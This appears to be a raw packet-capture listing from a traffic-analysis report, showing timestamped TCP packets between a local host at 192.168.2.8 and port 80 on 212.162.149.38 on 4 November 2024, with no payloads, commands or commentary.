                                      Nov 4, 2024 09:27:32.281526089 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281542063 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281599998 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281682968 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281693935 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281723022 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281734943 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281750917 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281774044 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281817913 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281830072 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281858921 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281871080 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281903028 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281914949 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281951904 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282027960 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282038927 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282051086 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282063961 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282078981 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282089949 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282120943 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282164097 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282176018 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282187939 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282211065 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282238007 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282588005 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282607079 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282618999 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282654047 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282748938 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282763004 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282773972 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282787085 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282808065 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282820940 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282885075 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282897949 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282907963 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282929897 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282951117 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.292507887 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292538881 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292550087 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292614937 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.292684078 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292697906 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292714119 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292725086 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292742968 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.292763948 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.292797089 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292835951 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.292910099 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292920113 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292929888 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292941093 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292948961 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.292954922 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292968035 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292975903 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.292994022 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293016911 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293179989 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293195009 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293206930 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293219090 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293226957 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293229103 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293247938 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293265104 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293371916 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293432951 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293442011 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293469906 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293488979 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293524981 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293535948 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293545008 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293561935 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293584108 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293617964 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293675900 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293688059 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293713093 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293723106 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293817043 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293828011 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293838024 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293849945 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293858051 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293876886 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293901920 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293991089 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.294001102 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.294034004 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.294083118 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.294164896 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.294203043 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.335908890 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.335947990 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.335959911 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.336024046 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.336046934 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.336059093 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.336102009 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404017925 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404038906 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404050112 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404053926 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404059887 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404071093 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404078007 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404170990 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404222012 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404231071 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404242039 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404253006 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404263020 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404273033 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404283047 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404299974 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404448986 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404459953 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404470921 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404481888 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404481888 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404505014 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404531002 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404624939 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404685974 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404697895 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404716969 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404743910 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404814005 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404824972 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404835939 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404855013 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404882908 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404938936 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404987097 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404998064 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405018091 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.405044079 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.405129910 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405139923 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405154943 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405177116 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.405201912 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.405249119 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405260086 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405292034 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.405308962 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405320883 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405329943 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405339956 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405370951 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.405370951 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.405518055 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405558109 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.405714035 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405775070 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405785084 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405814886 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.405842066 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.405888081 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405898094 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405906916 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405927896 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.405955076 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.415817022 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.415843010 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.415852070 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.415927887 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.415987015 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.415997028 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416007996 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416032076 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.416049957 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.416146994 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416157961 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416167974 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416177988 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416192055 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.416203022 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.416232109 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.416306019 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416316986 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416328907 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416340113 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416358948 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.416382074 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.416538954 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416548967 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416558027 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416568041 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416574955 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.416579962 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416593075 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416598082 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.416627884 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.416753054 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416788101 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.416821003 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416832924 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416867971 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.416945934 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416956902 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416966915 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416976929 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.416985989 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.417007923 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.417134047 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.417144060 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.417152882 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.417172909 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.417187929 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.417233944 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.417296886 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.417308092 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.417327881 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.417359114 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.417402983 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.417412996 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.417423010 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.417448044 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.417464018 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.459230900 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.459254980 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.459265947 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.459346056 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.459357977 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.459358931 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.459373951 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.459413052 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.527055979 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527116060 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527134895 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527151108 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527200937 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.527251959 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.527276993 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527290106 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527302027 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527308941 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.527322054 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527348042 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.527368069 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.527482986 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527496099 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527508020 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527519941 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527539968 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.527554989 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.527591944 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.527615070 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527637959 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527657032 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.527679920 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.527718067 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527729034 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527740002 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527746916 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.527769089 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527771950 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.527790070 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.527797937 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.527873993 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527887106 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.527930021 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.528132915 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528187990 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528199911 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528220892 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.528239965 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.528254986 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528321981 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528333902 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528353930 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.528388023 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.528439999 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528451920 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528466940 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528475046 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.528491974 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.528541088 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528552055 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528557062 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.528578043 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.528594971 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528601885 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.528609991 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528664112 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.528664112 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.528695107 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528707981 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528728962 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.528744936 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.528754950 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528784990 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.528817892 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528834105 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528853893 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.528870106 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.528983116 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.528995991 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.529010057 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.529023886 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.529030085 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.529063940 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.529161930 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.529175997 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.529191971 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.529196024 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.529206991 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.529222965 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.529282093 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.529282093 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.539077044 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539113045 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539129019 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539197922 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.539235115 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539242029 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.539249897 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539263964 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539275885 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539287090 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.539294958 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539329052 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.539340019 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.539480925 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539499998 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539516926 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539530039 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539537907 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.539542913 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539551973 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.539577007 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.539701939 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539715052 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539729118 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539747953 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.539762974 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.539797068 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539808989 CET8049709212.162.149.38192.168.2.8
